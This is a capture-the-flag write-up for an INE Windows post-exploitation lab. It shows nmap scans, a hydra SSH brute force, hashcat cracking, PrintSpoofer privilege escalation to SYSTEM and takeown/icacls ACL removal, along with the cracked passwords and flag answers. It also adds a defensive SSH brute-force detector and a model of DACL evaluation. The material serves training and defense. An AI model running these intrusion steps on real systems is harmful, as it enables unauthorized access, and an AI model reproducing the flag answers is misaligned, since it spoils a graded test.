
Post-Exploitation CTF 2

Overview

This lab involves exploiting a Windows target machine. By identifying insecure configurations, cracking hashes, and leveraging privilege escalation techniques, you'll uncover and capture the flags. Challenges include exploiting an insecure SSH user, cracking password hashes, escalating privileges and overcoming restricted access to files.

Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.

Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capture the flags.

Flag 1: An insecure ssh user named alice lurks in the system.
Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
Flag 3: Can you escalate privileges and read the flag in the C:\Windows\System32\config directory?
Flag 4: Looks like the flag present in the Administrator's home denies direct access.
The following will be useful:

Wordlist: /usr/share/wordlists/metasploit/unix_passwords.txt
Tool: /root/Desktop/PrintSpoofer.exe

Writeup

Flag 1

We used nmap on the target:

┌──(root㉿INE)-[~/Desktop]
└─# nmap --min-rate=10000 -p- target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-15 12:27 IST
Nmap scan report for target.ine.local (10.4.30.21)
Host is up (0.0098s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
[...]

We then ran nmap on specific ports:

┌──(root㉿INE)-[~/Desktop]
└─# nmap -p22,135,139,445,3389,18837,23920,25377,32621,32747,49152,49153,49154,49155,49170,49181 -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-15 12:29 IST
[...]
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
[...]

The CTF overview suggested an insecure SSH user named alice. We attempted to brute-force the SSH port using hydra and the provided wordlist.

┌──(root㉿INE)-[~/Desktop]
└─# hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://target.ine.local
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
[...]
[22][ssh] host: target.ine.local   login: alice   password: princess1

We found the credentials alice:princess1. After connecting via SSH, we located the first flag.

alice@WIN-GQ7PTVEC6HL C:\Users\alice>dir
 Volume in drive C has no label.
 Volume Serial Number is AEDF-99BD

 Directory of C:\Users\alice
[...]
05/15/2025  06:52 AM                34 flag1.txt
[...]
Answer

3144e5983aa44960ab6e139b27e3ac06
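From the defender's side, the hydra run above leaves a burst of failed password attempts for one user from one source, followed by a success. The following is an added example, not part of the original writeup, that flags that pattern over constructed sshd log lines (the message text is the standard OpenSSH format; the host name, addresses and timestamps are made up). A threshold of five failures per minute per (source, user) pair is an assumed tuning value.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd log lines (not captured from the lab). The message
# text is the standard OpenSSH "Failed password" / "Accepted password" format.
SAMPLE_LOG = """\
May 15 12:30:01 WIN-HOST sshd[1201]: Failed password for alice from 10.4.30.5 port 51000 ssh2
May 15 12:30:01 WIN-HOST sshd[1202]: Failed password for alice from 10.4.30.5 port 51001 ssh2
May 15 12:30:02 WIN-HOST sshd[1203]: Failed password for alice from 10.4.30.5 port 51002 ssh2
May 15 12:30:02 WIN-HOST sshd[1204]: Failed password for alice from 10.4.30.5 port 51003 ssh2
May 15 12:30:03 WIN-HOST sshd[1205]: Failed password for alice from 10.4.30.5 port 51004 ssh2
May 15 12:30:03 WIN-HOST sshd[1206]: Failed password for alice from 10.4.30.5 port 51005 ssh2
May 15 12:30:04 WIN-HOST sshd[1207]: Accepted password for alice from 10.4.30.5 port 51006 ssh2
May 15 12:45:00 WIN-HOST sshd[1300]: Failed password for david from 10.4.30.9 port 40000 ssh2
May 15 13:10:00 WIN-HOST sshd[1301]: Accepted password for david from 10.4.30.9 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+"
)


def parse_line(line, year=2025):
    """Return (timestamp, 'Failed'|'Accepted', user, source_ip) or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """One alert per (source, user) whose failures inside `window` reach
    `threshold`; the alert also records whether a later login succeeded,
    which turns a noisy guess attempt into a confirmed compromise."""
    failures = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerted = {}                    # (src, user) -> alert record
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        key = (src, user)
        if result == "Failed":
            if key in alerted:
                alerted[key]["failures"] += 1
                continue
            q = failures[key]
            q.append(ts)
            while q and ts - q[0] > window:      # slide the window
                q.popleft()
            if len(q) >= threshold:
                alerted[key] = {"src": src, "user": user, "first_seen": q[0],
                                "failures": len(q), "succeeded": False}
        elif result == "Accepted" and key in alerted:
            alerted[key]["succeeded"] = True
            alerted[key]["success_at"] = ts
    return list(alerted.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Only alice's source trips the rule here; david's single failure stays under the threshold. In practice the same pair (many failures, then an Accepted) is the event to page on, and the fix is the usual one: no password authentication on SSH, or at least a lockout policy and a password that is not in a public wordlist.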

Flag 2

We took the hashdump and used hashcat to crack it.

┌──(root㉿INE)-[~/Desktop]
└─# hashcat -m 1000 hashdump.txt /usr/share/wordlists/metasploit/unix_passwords.txt
hashcat (v6.2.6) starting
[...]
8883a4229c5553c9cca6856a53011e4c:princess1
ca8e025e9893e8ce3d2cbf847fc56814:orange
[...]

We found the password orange corresponding to the user david. After logging in via SSH, we found the flag.

 Directory of C:\Users\david
[...]
05/15/2025  06:52 AM                34 flag2.txt
[...]
Answer

df38e2347d184376a810eeb4acb52d7f

Flag 3

We checked our privileges:

[...]

Our token held SeImpersonatePrivilege, which lets a process impersonate tokens it obtains and is what PrintSpoofer and the Potato family of tools abuse to escalate to SYSTEM. Since PrintSpoofer was already on our attack machine (/root/Desktop), we transferred it to the Windows target using scp.

┌──(root㉿INE)-[~/Desktop]
└─# scp PrintSpoofer64.exe david@target.ine.local:.
david@target.ine.local's password:
PrintSpoofer64.exe

We executed it:

david@WIN-GQ7PTVEC6HL C:\Users\david>PrintSpoofer64.exe cmd
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

We then accessed the flag:

C:\Windows\system32>cd config

C:\Windows\System32\config>dir
[...]
05/15/2025  06:52 AM                34 flag3.txt
[...]

Flag 4

We tried accessing the final flag:

C:\Users\Administrator>whoami
nt authority\system

C:\Users\Administrator>cd flag
Access is denied.

Despite running as SYSTEM, we couldn't list the folder. We took ownership of it:

C:\Users\Administrator> takeown /F flag /R

SUCCESS: The file (or folder): "C:\Users\Administrator\flag" now owned by user "WORKGROUP\WIN-GQ7PTVEC6HL$".
[...]

We checked permissions:

C:\Users\Administrator>icacls flag
flag NT AUTHORITY\SYSTEM:(OI)(CI)(DENY)(RX)
     BUILTIN\Administrators:(F)
[...]

We removed the DENY entry for SYSTEM. Windows evaluates explicit DENY ACEs before ALLOW entries, which is why SYSTEM was refused even though BUILTIN\Administrators holds (F):

C:\Users\Administrator>icacls flag /remove "NT AUTHORITY\SYSTEM"

C:\Users\Administrator>cd flag

C:\Users\Administrator\flag>type flag4.txt
Answer

c5b52164d6e24c7c823b70b77cf318cc
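Why SYSTEM was denied although BUILTIN\Administrators had (F), and why takeown followed by icacls /remove fixed it, comes down to how Windows evaluates a DACL. The model below is an added example, not from the writeup: a simplified AccessCheck with named rights instead of access masks and account names instead of SIDs, replaying the Flag 4 steps. The explicit DENY for SYSTEM wins because deny ACEs are evaluated first, WRITE_DAC was never denied and is also granted implicitly to the owner, and dropping the entry restores access.

```python
from dataclasses import dataclass

# Access-right names used by this model (a subset of the Windows file rights).
READ, WRITE, EXECUTE = "R", "W", "X"
READ_CONTROL, WRITE_DAC, WRITE_OWNER = "RC", "WDAC", "WO"
FULL = frozenset({READ, WRITE, EXECUTE, READ_CONTROL, WRITE_DAC, WRITE_OWNER})


@dataclass(frozen=True)
class Ace:
    trustee: str        # account or group name (a SID in a real ACL)
    kind: str           # "ALLOW" or "DENY"
    rights: frozenset


@dataclass(frozen=True)
class Token:
    user: str
    groups: frozenset   # group memberships carried by the token


def access_check(dacl, owner, token, requested):
    """Simplified Windows DACL evaluation:
    - the object's owner is implicitly granted READ_CONTROL and WRITE_DAC;
    - ACEs are walked in order; a DENY ACE whose trustee is in the token and
      which covers any still-ungranted requested right fails the whole request;
    - ALLOW ACEs accumulate rights until every requested right is granted;
    - a right nobody grants is denied."""
    requested = frozenset(requested)
    principals = {token.user} | set(token.groups)
    granted = set()
    if owner in principals:
        granted |= {READ_CONTROL, WRITE_DAC}
    for ace in dacl:
        if requested <= granted:
            break
        if ace.trustee not in principals:
            continue
        if ace.kind == "DENY":
            if ace.rights & (requested - granted):
                return False
        else:
            granted |= ace.rights
    return requested <= granted


def canonical(dacl):
    """icacls and Explorer keep explicit DENY ACEs ahead of ALLOW ACEs. In a
    DACL written the other way round an earlier ALLOW satisfies the request
    before the DENY is ever reached."""
    return sorted(dacl, key=lambda ace: 0 if ace.kind == "DENY" else 1)


SYSTEM = "NT AUTHORITY\\SYSTEM"
ADMINS = "BUILTIN\\Administrators"

# The DACL icacls reported for the flag folder, expressed in this model.
FLAG_DACL = [
    Ace(SYSTEM, "DENY", frozenset({READ, EXECUTE})),
    Ace(ADMINS, "ALLOW", FULL),
]
# The SYSTEM token carries Administrators membership.
SYSTEM_TOKEN = Token(SYSTEM, frozenset({ADMINS}))


def walkthrough():
    """Replay the Flag 4 steps; returns (listing_before, can_edit_dacl, listing_after)."""
    before = access_check(FLAG_DACL, "Administrator", SYSTEM_TOKEN, {READ, EXECUTE})
    # takeown: the caller is now the owner, which implicitly adds WRITE_DAC.
    can_edit = access_check(FLAG_DACL, SYSTEM, SYSTEM_TOKEN, {WRITE_DAC})
    # icacls /remove "NT AUTHORITY\SYSTEM": drop every ACE for that trustee.
    after_dacl = [ace for ace in FLAG_DACL if ace.trustee != SYSTEM]
    after = access_check(after_dacl, SYSTEM, SYSTEM_TOKEN, {READ, EXECUTE})
    return before, can_edit, after


if __name__ == "__main__":
    print(walkthrough())   # (False, True, True)
```

In the model the DACL edit is permitted through two routes: ownership grants WRITE_DAC implicitly, and the Administrators entry grants it too because the DENY covered only RX. The takeown step therefore guarantees WRITE_DAC whatever the ALLOW entries say, which is what makes it the reliable first move. The same evaluation order is why a DENY ACE is the correct way to wall off a folder from a broad group while still allowing specific members, and why an ACL that a tool reports as non-canonical deserves a look.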